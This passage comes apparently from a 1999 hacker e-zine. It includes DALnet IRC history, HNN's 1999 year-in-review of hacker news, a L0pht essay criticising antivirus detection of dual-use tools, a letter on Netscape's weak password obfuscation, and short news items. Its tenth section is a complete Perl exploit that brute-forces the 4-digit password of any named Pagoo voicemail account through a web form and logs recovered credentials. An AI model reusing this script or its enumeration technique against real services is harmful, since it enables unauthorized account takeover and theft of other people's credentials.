in 1991. During this period information was relayed from around the world.
Family's could communicate from thousands of miles away. IRC was a meeting
place and an information clearinghouse for those who needed
information that was both up to date and reliable.
IRC has also been used during the Los Angeles Riots, the bombings in
Israel,the Presidential Elections in the United States, and of course,
Monica Lewinsky's deposition. Logs of these chats are available if you
click here. The DALnet IRC Network believes strongly in free speech
and freedom unless United States Federal Law or worldwide law is broken.
As will be stated below, IRC is supported by individuals who gain no
profit from their support of IRC (ISPs excepted).Therefore, many IRC
networks including DALnet do not allow the trading of illegal software or
'warez' or the so called 'kiddy-porn.'
At this time DALnet has about 40,000 users and forty-two servers
worldwide. It is important to remember that Internet Relay Chat is free
and is supported not by a conglomerate company but by a small group of
generous ISPs (Internet Service Providers), Admins (Server
Administrators) and IRCops (IRC Operators). None of these people are paid
for their support and generously provide a safe environment for you, the
user.
2. Information on DALnet
The DALnet IRC Network was created as a replacement for the troubled EFnet
(Eris Free Net) and Undernet IRC Networks. EFnet has over ffity-thousand
users and eight thousand active channels. This is the largest of the IRC
Networks but it does have many troubling downsides. EFnet is also
one of the slowest networks. There is usually tremendous lag time because
of overwhelming users, bad server routing and connections and also
hacking. EFnet has hundreds of servers but has frequent NetSplits and thus
needed to be replaced by something more efficient. From this the Undernet
was born.
Undernet, though smaller, has servers in the United States, Canada,
Australia and in Europe. The Undernet attempted to do away with the high
consumption of bandwidth and channel chaos that was created by a large
number of users running bots (programs that perform a certain task).
These bots were usually intended to protect channels from takeovers or
were used to takeover channels themselves. The Undernet offered the
CService-a program that allowed users with W or X type bots to register
channels and protect them from troublemakers. The Undernet hit major
stumbling blocks in the areas of customer services and care, but the one
area of service that the Undernet excelled at was in innovations. The
Undernet allowed for new commands to be installed in the IRCd and new
channel modes to be used. It also allowed for greater security for
channels and channel modes aswell as users.
The summer of the year 1994 dawned a new age for the users of Internet
Relay Chat. During this time the DALnet IRC Network was formed using a
modified version of the Undernet IRCd. This IRCd was edited cheifly by
Alexei "Lefler" Kosut. Some of the innovations included: global
WallOps (IRCop messages that can be seen by users who are +w (/mode
NickName +w)), longer nicknames, Q:Lined nicknames (nicknames that cannot
be used i.e. ChanServ, IRCop, NickServ, etc.), global K:Lines (ban of one
person or an entire domain from a server or the entire network), IRCop
only communications: GlobOps, +H mode showing that an IRCop is a HelpOp
also and many, many, many more features. DALnet's unique services were
originally coded in early 1995 by Brian "Morpher" Smith and allow users to
own nicknames, channels, send memos and do much, much more. These services
are superior to the X and W bots because they are omnipotent and invisably
reside in every channel. Because of this channel bots are not needed.
ChanServ's automatic channel registration eliminates the lengthy processes
of Undernet while still being extremely easy to use and also very secure.
DALnet also provides users with the ability to 'own' one's NickName. The
/nickserv register PASSWORD command is all that is needed to own your own
nickname an ensure that it is always there for you when you come online
Note: PASSWORD is your own password that you MUST remember or write
down for future use). DALnet users can also send Post-It type 'memos' to
eachother if both user's nicknames are registered. More info on services
is available on their pages.
Many servers have linked to and parted from DALnet in the few years that
it has existed. Some have left due to bandwidth problems, Internet Service
Provider problems, interpersonal problems, and other reasons.
3. Looking to the future
DALnet continues to grow. It's user count has rocketed from around 30,000
at the beginning of 1999 to 45,000 during the Summer. DALnet's extensive
and well developed help system, whereby a person has a large number of
'recommended' channels and other resources at their fingertips,
continues to go from strength to strength. Among the current innovations
are freshly coded services which allow users to gain full potential from
nickname and channel registration and the new IRCd
(http://www.bahamut.net) to ensure a quick, worry-free connection.
DALnet's staff are still the pride of the network; users can join
#OperHelp for speedy assistance from an IRCop, and you'll always be
assured of a smiling, helping hand when you
need it.
Some information contributed by: nelgin, Sentinele, dalvenjah,
WebMaster, blofeld and the_saviour.
@HWA
10.0 Pagoo Internet voice MailBox by Loophole/HHP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Source: Loophole
#!/usr/bin/perl
#
# (hhp) hhp-pagoo.pl (hhp)
# by: LoopHole of the hhp.
# http://hhp.hemp.net/
# 6/25/99
#
# The (Pagoo Internet voice MailBox) exploit.
# Available at http://www.pagoo.com/
#
# This exploit will extract the password to
# the specified PagooID you specify.
#
# The vulnerability comes into play when you
# connect to your UpdateForm thru signup.asp
# which requires your PagooID and your 4
# digit password.
#
# Nothing will prevent you from reconnecting
# and trying a new password from 0000 in
# increments of 1 till we reach 9999 which
# is the highest password possible... I
# could call this a brute, but it always
# 100% of the time will get the passwd
# unlike a brute.
#
# Logs passwds to file: pagooids
use IO::Socket;
die "usage: $0 <PagooID>\n" unless(@ARGV == 1);
($box) = (@ARGV);
open OUT, ">>pagooids" or die "Can't open temp file -> .pagoo\n";
autoflush OUT 1;
$host = "www.pagoo.com";
autoflush STDOUT 1;
sub parse
{
($num) = @_;
$url = "/asp/signup/signup.asp?Service=UpdateForm&PagooID=$box&Password=$num";
$socket = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => 80,
Proto => "tcp") or die "Can't connect.\n";
print $socket "GET $url\n";
print "Trying password: $num of 9999.\n";
while(<$socket>)
{
chomp;
if(/Password invalid/)
{
break;
}
if(/First Name/)
{
print "PagooID password extracted...\n";
print "PagooID: $box / Password: $num\n";
print OUT "PagooID: $box / Password: $num\n";
exit 0;
}
}
}
$num = '0000';
parse $num;
for($i = 0; $i <= 9999; $i++)
{
$num++;
parse $num;
}
@HWA
11.0 HNN: The Year in Review 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Note: Check the url for relative links included in the text. - Ed
Page 1
Nineteen Ninety Nine was an exciting year that saw
explosive growth for HNN and our ever continuing battle
against Fear, Uncertainty, and Doubt (FUD). While some
of our engagements with FUD have been successful, like
the alleged moving of a British satellite, other battles like
the numerous virus scares, were not. 1999 also saw some
major events unfold in the underground community, from
the exposure of Se7en as a fraud, to the removal and
resurrection of Packet Storm Security, and the debacle of
MTV. At the close of the year Kevin Mitnick is awaiting
release while others take his place behind bars.
Throughout 1999 HNN was the place on the net to get up
to date breaking news on these stories.
These top eleven stories of 1999 are not presented in any
particular order.
LoU China-Iraq War
On December 29, 1998 the underground group Legions of
the Underground declared an all out cyber warfare on
information infrastructure of China and Iraq. They cited
severe civil rights abuses by the governments of both
countries as well as the sentencing to death of two bank
robbers in China and the production of weapons of mass
destruction by Iraq as the reasons for their declaration.
By January 5th, 1999 a group known as spl0it and a group
based in Poland said that would assist LoU in their cyber
warfare efforts.
On January 6th, 1999 Legions of the Underground released
a statement contradicting their earlier statements that
claimed that they never had destructive intentions and
blame the media for letting this get out of hand.
The retraction by LoU came to late. On the next day
January 7th, 1999 an International Hacker Coalition
including groups such as cDc, L0pht, CCC, 2600, Phrack,
!HISPAHACK and others released a joint statement
condemning the Legions of the Underground and their
Declaration of War.
By January 8, 1999 LoU was reeling from the overwhelming
support of the joint condemnation of LoU's actions and
released additional retractions of their declaration of war.
On January 13, 1999 the Legions of the Underground told
Wired magazine that the original press conference was a
fake and that the people present during the press
conference were spoofed. There is no evidence to support
this but there is none to deny it either.
Finally Optiklenz, a member of LoU, releases a statement
on the view of what happened from the LoU perspective.
LoU-China-Iraq War Histogram - Chronological Listing of
Events
HNN Archive for December 29, 1998
Transcript of IRC Press Conference with LoU
LoU Declaration of War
HNN Archive for January 6, 1999
International Hacker Coalition Joint Statement
LoU Retraction of War Declaration
Optiklenz Statement
Hackers Move British Military Satellite
This is one battle with FUD that we like to claim that we
won. On March 1, 1999 The Sunday Business published a
story that was later picked up by the Reuters wire
service, that a British military satellite had been taken
over by cyber attackers and was being held for ransom.
The story itself lacked any sort of verifiable information
and HNN called it into question immediately. By the next
day spokes people from the British Ministry of Defense flat
out denied that such a thing was even possible. HNN
editor Space Rogue was a guest on the radio show "Off
the Hook" to discuss this incident. Both ZDNet and MSNBC
ran stories covering this non event crediting HNN for
calling the story suspect. Bob Sullivan of MSNBC went so
far as to label HNN "The Voice of Reason".
HNN Archive for March 01, 1999
HNN Archive for March 02, 1999
Original Sunday Business Article
Security Analysis of Satellite Command and Control Uplinks
- Buffer Overflow Article by Brian Oblivion
MSNBC
ZD Net
Off The Hook - March 02, 1999 episode
Se7en Exposed
An article written by Steve Silberman and published by
Wired exposed Se7en (Christian Valor) and his single
handed cracker crusade against pedophiles as a complete
sham. Se7en succeed in creating a massive media hack as
articles of his infamous exploits were published in Forbes,
MSNBC, LA Times, Newsday and others over several
months. Only one of the journalists that we know, Adam
Penenberg, that had been duped by Se7en actually
admitted his mistake and published a public apology.
HNN Archive for February 8, 1999
Attrition.org - Evidence used against Se7en
Wired
Open letter from Adam Penenberg
HNN: The Year in Review
Page 2
John Vranesevich Shuts Down Packet Storm Security
Probably the biggest story of 1999 was the actions of
John Vranesevich, founder and administrator of AntiOnline,
who was instrumental in getting the extremely popular
web site Packet Storm Security shut down.
As far as can be determined John Vranesevich discovered
a private directory on Packet Storm that contained
potentially libelous material about him and his family. Mr.
Vranesevich did not contact the site administrator directly
but instead sent an email to the administrators at Harvard
University asking that the objectionable material be
removed. Harvard responded by unceremoniously pulling
the plug on the whole site.
Once word of how and why Packet Storm had gone down
a public outcry ensued. Mailing lists where started, people
started an attempt to mirror the site, Ken Williams
received numerous offer to host the site and Mr.
Vranesevich became the whipping boy du jour.
Because Mr. Williams was unable to access his web site,
which was his senior project, he was forced to drop out of
school. He later sold the web site to Kroll O' Gara and took
a position at a major internet security company.
HNN Archive for July 1, 1999
HNN Archive for July 2, 1999
Attrition.org - Examples of the supposedly libelous
materials posted to Packet Storm
Ken Williams Statement
AntiOnline - John Vranesevich's Defense
Letter from Harvard
Ken Williams Response to Harvard
Letter From Bronc Buster - Regarding the actions of Mr.
Vranesevich
ZD Net
HNN Pulls Massive April Fools Joke
It was meant as a simple joke, a simple April Fools Day
prank, a reason to smile or to laugh. It turned into one of
the biggest stories in the underground for 1999. At
midnight EST on April 1, 1999 the main Hacker News web
page was updated with what appeared as a web
defacement. The page contained all the required elements
of a defacement, poor spelling, hax0r speak, shout outs,
etc... Many, many, bought the defacement hook line and
sinker, HNN administrators even got personal phone calls
to their homes at 8am to inform them of the defacement.
Remember, even as recently as April web defacements
were a relatively rare thing, not occurring by the dozens
like they are today. Ahhhh, but the fun did not stop there.
At Noon EST the HNN pranksters felt the unsuspecting
public needed even more mayhem and hi jinx. The defaced
page came down and the days news went up. The news
contained stories such as Kevin Mitnick breaking out of jail
by whistling a 300 baud carrier into a phone, L0pht Heavy
Industries selling L0phtCrack for $1.2 billion to NAI, CERT
going out of Business, and Microsoft buying Network
Solutions for complete control of the Internet. Considering
the volume of mail we received regarding these stories
(some of which came from mainstream journalists) many
many people believed them.
Archive of HNN Defacement
HNN Archive for April 1, 1999
PhoneMasters
For some reason the mainstream media has really not paid
attention to this story. Considering the level to which
these crimes escalated and the methods and effort
needed to catch the these crooks it is a wonder that
there wasn't more media coverage.
The FBI called them the 'Phone Masters' and labeled their
crimes as one of the greatest cyber-intrusions of all time.
Court records show that the Phone Masters had gained
access to telephone networks of companies including
AT&T Corp., British Telecommunications Inc., GTE Corp.,
MCI WorldCom (then MCI Communications Corp.),
Southwestern Bell, and Sprint Corp. They broke into
credit-reporting databases belonging to Equifax Inc. and
TRW Inc. They entered Nexis/Lexis databases and
systems of Dun & Bradstreet. They could eavesdrop on
phone calls, compromise secure databases, redirect
communications, they also had access to portions of the
national power grid, and air-traffic-control systems.
The FBI had to invent special equipment they called a
'data tap' specifically for this case and get special
permission from DOJ to use it. It took several years of
listening to phone calls to gather enough evidence for an
arrest but on February 22, 1995 the FBI conducted a raid
on three suspected members of the PhoneMasters. Other
members of the group are thought to remain at large.
Three members of the group pleaded guilty to federal
charges of one count of theft and possession of
unauthorized calling-card numbers and one count of
unauthorized access to computer systems. The three
where sentenced in October for 24 to 41 months in federal
prison.
What bothers us most about this story is that almost no
mainstream media has reported on the story. The first
mention we can find about the Phone Masters is from a
local TV stations, WFAA in Dallas FortWorth back in the
beginning of May.
Phone Master Hacks - Buffer Overflow Article
HNN Archive October 4, 1999 - PhoneMasters Plead Guilty
Wall Street Journal - one of the few articles about this
case
Union Tribune - Another rare article that has a little bit
more info.
CNN - Tries to answer why the media missed the boat
Aviary Mag - Interview with An Acquaintance of the
Phone Masters
MTV
Serena Achtul host of MTV News and of a documentary
style program known as 'True Life' wanted to do a show
on 'hacking' and in particular a show about Kevin Mitnick.
She was placed into contact with Emmanuel Goldstein of
2600 Magazine who organized several interviews for her.
He spent a lot of time and effort in getting good people
for her to talk to and they shot several hours worth of
film.
For one reason or another the Kevin Mitnick aspect of the
show was cut out, so being a good sport Emmanuel
directed Serena to the folks at L0pht Heavy Industries.
The L0pht crew made time in their busy schedules to
spend an entire day with Serana and her film crew
explaining the finer points of what they do and explaining
the difference between script kiddie defacements and true
hacking.
Again for some reason, this angle for the show was not to
MTVs liking so they struck out on their own looking for
whatever it was they wanted. They found Shamrock, the
host of the Internet TV show devoted to hacking known
as Pseudo.
The result was a complete farce. Evidently Shamrock
decided to take MTV for a ride and give them what they
wanted, a story line straight out of the movie Hackers.
The show did nothing to explain what hacking was all
about and was far from a documentary. Needless to say
many people are upset at MTV and others over this mess.
Letters from HNN Viewers
Letter from Emmanuel Goldstein
Letter from Shamrock
HNN: The Year in Review
Page 3
Defcon VII and BO2K
Defcon probably had the most mainstream media coverage
of any hacker convention to date. With over 3000
attendees and over 200 press representatives present it
was definitely one of the biggest conventions ever. With
the release of Back Orifice 2000 from the Cult of Dead
Cow the press was working at a fever pitch trying to
cover the story even before the software was released.
HNN spent quite a few days inebriated in Las Vegas while
we tried to cover the happenings at Defcon. Some of the
highlights included the BO2K launch presentation,
complete with thumping techno and strobe lights, the
ejection of Carolyn Mienel from the conference floor, and
the defacement of the Defcon.org web page.
When we returned we had over 1200 emails to answer and
one pounding hang over. The media went nuts over the
BO2K release, sparking debates on just what a virus is and
what should be scanned. Network Associates claimed to
be the first out of the gate with a patch for the program.
Microsoft was even prompted to release a security
bulletin.
Also at Defcon, Zero Knowledge released 1000 beta copies
of Freedom, L0pht Heavy Industries introduced the
revolutionary new security tool AntiSniff, Bruce Schneier
announced that PPTPv2 'sucks less', and Security Wizards
released their Capture the Flag Logs.
HNN Archive for July 9, 1999 - Press frenzy prior to con
Defcon.org Defacement Mirror
HNN Archive for July 13, 1999 - the Aftermath
Defcon VII Review - Buffer Overflow Article
The Back Orifice 2000 Controversy - Buffer Overflow
Article
How the Anti Virus Industry Works - Buffer Overflow
Article
AntiVirus scanning for potentially misused tools is a
doomed security strategy. - Buffer Overflow Article
Kevin Mitnick
Kevin Mitnick's road has been a long and bumpy one that
has stretched for several years, 1999 was no different.
One small bright thing is that Kevin is scheduled to be
released, finally, sometime early in 2000.
In March the federal government succeeded in wearing
Kevin down. He decided to plead guilty in the hopes to get
his four year ordeal over with. Unfortunately he still had
charges from the State of California to deal with.
HNN Archive for March 29, 1999
On April 26th it was revealed that the companies
supposedly hurt by theft of software by Kevin Mitnick
never reported those millions of dollars in losses to the
SEC as required by law.
HNN Archive for April 25, 1999
Letters from companies estimating the amount of
damages.
June 4th was supposed to be the day in which Kevin was
officially sentenced and so demonstrations to support
Kevin were planned at federal courthouses across the
country. Unfortunately the hearing was postponed at the
last minute but the demonstrations continued. Folks in
other countries joined in by protesting outside embassies,
the New York demonstration hired a skywriter to write
FREE KEVIN over Central Park, the Philadelphia
demonstration made onto the local news and many online
news agencies covered the San Francisco Demonstration,
numerous other cities attempted to live web cast their
demonstrations.
HNN Archive for June 5, 1999
Press Release -Demonstration Announcement
Picture of the Russian Demonstration
On Kevin's fifth birthday behind bars the LA District
Attorney graciously decided to drop the state charges
against him. The DA claimed that the case had been
mischarged.
Finally on August 9th, after numerous delays, Kevin
received his sentence of 46 months in prison with credit
for time served. He will also be forced to pay $4125
restitution to the supposed victims in the case. Instead of
halfway house as expected he was remanded to Lompac
Federal Prison.
HNN Archive for August 9, 1999
Much more in depth information regarding Kevin Mitnick,
his current status and the historical significance of this
case can be found here.
FREE KEVIN
Virus Scares
1999 was a banner year for viruses. Melissa, CIH, and
numerous other viruses had the press working over time.
The virus writers keep churning them out, the antivirus
companies keep detecting them and the press was not far
behind.
Melissa seemed to be extremely virulent. By emailing 50
copies of itself after every infection it made it around the
globe very quickly. It managed to jump the air-gap onto
US governments SIPRNet and even made it on board ships
in the Seventh Fleet. Numerous variants of Melissa
surfaced with distributed DoS attack capability. Melissa
was somehow traced through usenet to AOL and finally to
David L. Smith who pleaded guilty to creating and
releasing the virus.
HNN Archive for March 31, 1999 - Melissa makes it to 7th
Fleet, Kills Marines Email, DoS Variant Appears
HNN Archive for April 2, 1999 - David Smith arrested and
released on $100,000 bail
HNN Archive for April 5, 1999 - Melissa jumps air-gap onto
classified SIPRNet
HNN Archive for December 12, 1999 - David Smith pleads
guilty.
CIH while not as prolific as Melissa was definitely more
destructive. CIH or Chernobyl is triggered to release its
payload on April 26th every year and it has been around
for a while. It hit exceeding hard this year especially in
the Far East. Its creator was traced back to Taiwan
where he said he was sorry.
HNN Archive for April 27, 1999 - CIH strikes worldwide
HNN Archive for April 29, 1999 - CIH Author Identified.
HNN Archive for May 12, 1999 - China Estimates 360,000
systems Damaged by CIH
The Virus Community Speaks
How the Anti Virus Industry Works - Buffer Overflow
Article
AntiVirus scanning for potentially misused tools is a
doomed security strategy. - Buffer Overflow Article
Ireland, Indonesia, China, Sweden, and Yugoslavia
Government sanctioned cyber attacks seem to be all the
rage these days. Some countries are openly announcing
their plans to create offensive cyber warriors while others
are claiming to have already suffered government
sanctioned cyber attacks.
In January a small ISP in Ireland, Connect Ireland, that
hosts the top level domain for East Timor claimed that it
had suffered a massive attack by Indonesian government
forces. Indonesia of course denied the charges.
HNN Archive for January 26, 1999
Newsweek claimed that President Clinton authorized a
"top-secret" plan against Slobodan Milosevic. One part of
this plan would use "computer hackers" to attack his
foreign bank accounts. Newsweek went on to say that
the report instructed the CIA to wage "cyberwar" against
Milosevic.
HNN Archive for May 24, 1999 HNN Archive for July 6,
1999
Yugoslavia Cut Off from the Net? - Buffer Overflow Article
Sweden announced the formation of a cyber defense
force.
HNN Archive for July 14, 1999
Nobel Peace Prize laureate Jose Ramos-Horta claimed that
hundreds of people around the world were poised to
launch a cyber attack against Indonesia should there be
any tampering in the election process for East Timor's
freedom. No evidence was given for this cyber arsenal
build up and no attack ever came. Connect Ireland, the
ISP supposedly targeted by Indonesian forces earlier in
the year asked that no internet attacks be launched.
HNN Archive for August 20, 1999
Connect Ireland - response to Indonesian threats
A Chinese military newspaper covering the activities of
China's Peoples Liberation Army has called for the
recruitment of 'civilian hackers' and for the training of
'cyber warriors' at Army schools.
HNN Archive for August 4, 1999
We hope that this disturbing trend does not continue into
the next year. It will be an extremely bad day when the
internet is legislated as a weapon of war.
@HWA
12.0 AntiVirus scanning for potentially misused tools is a
doomed security strategy.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
The Anti-Virus vendors seem to be taking on a larger
role. Not only are they scanning for true viruses and
trojan horses but any software that may potentially be
misused, as long as it is not their own software. This
activity does nothing to close the holes in your network
but instead gives you a false sense of security.
Buffer Overflow
http://www.hackernews.com/bufferoverflow/
AntiVirus scanning for
potentially misused tools is a
doomed security strategy.
By: Weld Pond, weld@l0pht.com
L0pht Heavy Industries
December 20, 1999
There is a growing trend with AntiVirus scanners today.
The scanners are scanning for more and more software
that does not contain virus or trojan code. The new
category of software the scanners are looking for is
common software that has the *potential* to be misused
by malicious persons. Usually this software is in the
security auditing tool, network monitoring, or remote
control category.
Corporate customers of AntiVirus software have requested
that these potentially misuseable programs be flagged
and, in some cases, "disinfected" by the scanning
software. The AntiVirus vendors seem more than happy to
comply. Even going so far as to label this new category of
detected software as a "virus" or "trojan" when found, no
matter how misleading to the user this label is.
Another controvertial twist in this new AntiVirus category
is the fact that the AntiVirus vendors do not scan for their
own tools that fall into the new "potentially misusable
program" categories. Symantec's Norton AntiVirus will scan
for the remote control programs, NetBus or BO2K, but not
the company's own PC Anywhere. Network Associates'
McAfee VirusScan will detect the NT password auditing
tool, L0phtCrack, but will not detect the company's own
vulnerability auditing tool, Cybercop scanner, or their
network sniffers, Sniffer Basic or Sniffer Pro.
It is a fallacy that commercial tools are not misued by
malicious individuals. They are usually available as free
trial downloads or available on pirate software sites.
However, the whole notion of protecting a network by
scanning for potentially misuseable tools is a fallacy unto
itself!
Using AntiVirus client scanning technology to find
programs that can exploit the security problems on a
network is a losing battle. AntiVirus software can be
turned off. New tools or new versions of older tools will
soon become available. Other machines without AntiVirus
software can be attached to the network. Machines can
be booted with alternative OSes.
You need to actually fix the network security problems! It
is foolhardy to scan for tools that could exploit problems
rather than just fixing the problems. This scanning
scenario just gets OS and application vendors off the
hook. Now they don't have to fix the problems. They will
just rely on the AV vendors to scan for programs or code
that can exploit the problems. Why fix, for example, Win
95/98 challenge-response network authentication? Each
client on the network should be scanning for all known
tools that can sniff the network or crack the passwords.
Obviously this is not a good security model.
Scanning for potentially misused tools is leading network
security down the path to the horrible situation we have
with mobile code sent through email or through the web.
The current industry accepted solution is not to solve the
problem with a proper security architecture for hostile mail
or web content. But instead just scan for all *known*
malicious mobile code. Ugh! The AntiVirus vendors have a
vested interest in the status quo but this is not bringing
the industry closer to a solution. To broaden this
approach to cover network security problems is clearly
heading in the wrong direction.
Can you imagine a day when a vendor responds to an
intranet security vulnerability by saying, "This is not a
problem with our product. We do, as always, recommend
that all customers keep their AV software updated." It is
time to start making networks or computers secure
without relying on the approach of client code scanning. A
false sense of security is worse than known poor security.
If your network security cannot survive well known tools
being installed and executed then you need to start
addressing your problems, not sweeping them under the
rug.
Weld Pond
weld@l0pht.com
@HWA
13.0 RST Sets the Record Straight
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by John
Last week Reliable Software Technologies, Inc.,
released a new advisory regarding the storage of email
passwords by Netscape. They took a lot of flak from
people, including HNN, who thought this was an old
problem being rehashed by RST for cheap publicity. RST
would like to take a moment to sort out the details and
explain their new advisory and the old problem.
Letter from RST
http://www.hackernews.com/special/1999/rst.html
Reliable Software Technologies
http://www.rstcorp.com
Date: 12/19/99 21:57
Received: 12/19/99 22:04
From: John Viega, John@list.org
To: contact@hackernews.com
Hey,
I believe that what HNN posted today about the Netscape
thing is largely inaccurate. First, there are and have been
two different ciphers in use in Netscape that are similar,
but slightly different. The simpler one, which is a base 64
and an xor only (with potentially a pad), apparently made
the rounds a year ago, and people did note that it looked
similar on recent versions of windows. But it isn't the same
right now. Maybe Netscape changed their cipher from last
year, or perhaps it has been the same through the whole
4.0 series. I dunno, but at some point they did change it.
I looked at the 2.0 series, the 3.0 series, and 4.6 + 4.7 on
Windows. The 4.6 and 4.7 cipher is substantially different
from the 2/3 cipher. The 2/3 cipher is the same as current
versions of Unix and Mac. Let's face it... user habits are
different on Windows than on Unix. Few if any people use
NS to read mail on a Mac. Plus, Windows has a lot more
dumb users.
So we have defintely broken a different cipher. We didn't
know that the older cipher was previously broken. When
we talked to Netscape, they gave us no indication that it
ever had been. In fact, they seemed to be indicating that
they were crossing their fingers hoping that no one would
target it. Also, the old attack wasn't very well publicized.
Again, I suspect that NS new about the old attack, was
glad it stayed low key, and quietly made the algorithm a
bit harder on its flagship Windows version without making
a real effort to fix the problem.
The new cipher still does a base 64 encode and an XOR
with a fixed key. However, it also does some bit
permutations, and reads the bytes in reverse order. If you
look at the same 7 char password encoded with the old
algorithm and the new algorithm, you will notice that they
aren't the same. You'll notice the "=" pad is at the front in
the new kind, and comes last in the old kind. The strings
will also look similar, but aren't the same thing reversed, or
anything like that.
It wasn't that much stronger, but they obviously hoped it
would provide a bit more security. Funny, the MSDN
developer's network talks about security, mentions that
XOR is desirable, and suggests tricks like this to help
improve the security of XOR. It's completely and utterly
rediculous.
So, to summarize so far, the cipher is exactly as complex
as we said it was, and not "simpler than first thought".
There's been some unfortunate confusion between their
old cipher and their new one. It definitely would have
been nice if we'd run across info on the old one before we
talked to Netscape, or if they'd have told us about it, but
those things did not happen.
The next point I'd like to contend in today's HNN article is
the quote "To Netscape's credit they are just conforming
to the POP3 protocal which sends passwords in the clear
anyway." First, the save password feature works w/ POP3
and IMAP. IMAP doesn't require you to send passwords in
plaintext. If I recall correctly, there are a bunch of
different authentication mechanisms. Of course, I don't
know what NS uses or does not use. Second, I don't
believe that just because a password is going to be sent
in plaintext, you should make it even easier for people to
get at it. Even if you can't raise the bar high enough that
someone won't be able to jump it, you should raise the bar
as high as you can. Why didn't Netscape just leave the
password lying around in plaintext? Well, even really poor
obfuscation is going to stop most computer illiterates from
getting the password. They'll find it if it's in plaintext
(though someone might have to tell them it's there). At
many companies, it'd be that much easier to get your
boss' mail password, etc. just because he left himself
logged in.
So basic obfuscation raises the bar a bit. But script
kiddies can download software to decrypt the old
passwords (we haven't seen anyone post such software
for the new algorithm yet). Also, it's not too hard to
embed code to collect such passwords in email
attachments that show dancing pigs. In some older
versions of Netscape, the password could be extracted
remotely via JavaScript. For people who run both IE and
Netscape, there is a current IE bug that will let people
extract the ciphertext Netscape uses (Thanks to Richard
Smith for that). More such holes might (probably) exist
elsewhere.
I think that the more difficult you make this, the better,
even if the password is sent over the network in plaintext.
Why? Because it raises the bar a bit more. I believe that
fewer people have the skills to set up a sniffer, and mine
the data it produces than can run code to email back
encrypted passwords, and then run code to decrypt them.
Plus, there are tools like antisniff that can make it harder
to sniff. Plus, you have to wait around for the person to
actually check his mailbox from that machine (which he or
she might not even use anymore). It's not a much bigger
bar, true, but I believe it's a bit bigger nonetheless.
I've heard people argue that it is pointless for Netscape to
use real encryption such as Twofish or 3DES and hide a
key, because the key could be obtained through reverse
engineering. Well, it's true that you could obtain the key
that way. Again, I think it is a matter of raising the bar as
high as you can. If you hide the key well, few people will
be willing to go through the hassle of reverse engineering
the code. Sure, it may eventually happen, but Netscape
should hope that "eventually" at least buys them a little
bit of time where they can really offer some security to
people saving their passwords. There have been plenty of
products that have gone several years with embedded
keys that no one bothered to reverse engineer (at least,
so far as the public knows). For most people, reverse
engineering can be a huge time sink, and may not be
worth the effort, especially when really good obfuscation
is performed. There's generally always more interesting,
lower hanging fruit to be picked. I know that I sure
wouldn't have bothered to reverse engineer Netscape's
algorithm if we couldn't break it by other means, and I
believe a lot of other people feel the same way.
Another sentiment I have heard a bit in the past couple of
days is, "If you need access to run code on the machine
for this exploit, who cares, since you've already
compromised the machine?" Well, the primary response to
this is that mail account info is often a quick gateway to
other accounts on other machines. POP3 and IMAP
accounts often check the same password file telnetd
checks. Or, wu-ftpd, which you could use in conjunction
w/ a recent buffer overflow to get a shell. Also, plenty of
people use the same passwords for multiple accounts, PGP
passphrases, whatever. They shouldn't, but they do
anyway.
John
@HWA
14.0 Russian Politician Threatens Cyber Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by EvilWench
Russian politician, Vladimir Zhirinovsky, has threatened
to electronically steal money from Western bank
accounts. When asked what he would do to celebrate if
he wins an upcoming parliamentary election the
maverick politician announced that he would unleash
computer viruses on the West and steal their money.
Reuters - via Excite
http://news.excite.com/news/r/991219/18/russia-election-zhirinovsky
Jubilant Zhirinovsky wants to hack Western computers
MOSCOW (Reuters) - Russia's maverick politician Vladimir Zhirinovsky,
whose ultra-nationalist bloc looks set to do well in a parliamentary
election, said Monday he would celebrate by hacking into Western computers.
Zhirinovsky's bloc was running at more than eight percent in early results
compared with pre-election opinion polls which had given him some five
percent.Asked by Reuters whether he would have a drink to mark his party's
good showing, he said:
"No. No way, we Russians don't drink any more. We now work on computers,
we use computers to send viruses to the West and then we poach your
money."
"We have the best hackers in the world. We do not need to drink or smoke...
we do not drink, smoke, have drugs and we don't have AIDS, that's what
you have got in the West."
Russia is a heavy drinking nation which is struggling to catch up with
economically-advanced countries on the use of new technologies, such as
the Internet, but a lack of resources and poor infrastructure confines
progress to big cities.
Zhirinovsky who has run and done reasonably well in all parliamentary and
presidential elections since 1991 on a protest vote by lower stratas of
the Russian society, is one of the most eccentric politicians with an acute
political sense and bizarre sense of humour.
He has thrown juice at an opponent in a live televised debate, promised to
wash his boots in the Indian Ocean when Russia expands there and been
involved in fist-fighting in the State Duma lower chamber of parliament.
But at the same time, he has decided crucial votes in parliament in the
Kremlin's favor and has developed a well organised party with solid assets.
@HWA
15.0 PCR-1000 Control Suite Released by Ghetto.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Javaman
After many hard hours of labor from Polywog and
Javaman, Ghetto.org proudly releases it's first
mainstream product, the PCR-1000 Control Suite. The
PCR-1000 is a wideband, PC-controlled receiver whose
only decent control software was Win 9x/NT based.
Because of Ghetto.org, there is now a *nix solution.
Currently the code only compiles under Linux, they are
seeking assistance in porting to other platforms.
Ghetto.org
http://www.ghetto.org
PCR-1000 Control Suite
http://www.ghetto.org/projects
@HWA
16.0 Nuclear Power Plant Y2K Readiness
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by ZapfDing
A little paranoid about Y2K and whether that nuke plant
down the street is ready? The Nuclear Regulatory
Commission has released an interesting PDF file that lists
the Y2K transition period for all the nuclear power plants
in the world in relation to EST and UTC.
Nuclear Regulatory Commission and Y2K
http://www.nrc.gov/NRC/NEWS/year2000.html
Global Y2K Plant Listing - PDF
http://www.nrc.gov/IP/Y2K/yewstz.pdf
@HWA
17.0 New E-zines Released
~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by 1k Resistor and sony_103
Digital Defiance has done it again and come out with
their second issue. They continue to run head strong
with articles on house arrest devices as well as their
feature of the month of HiCards free phone cards. The
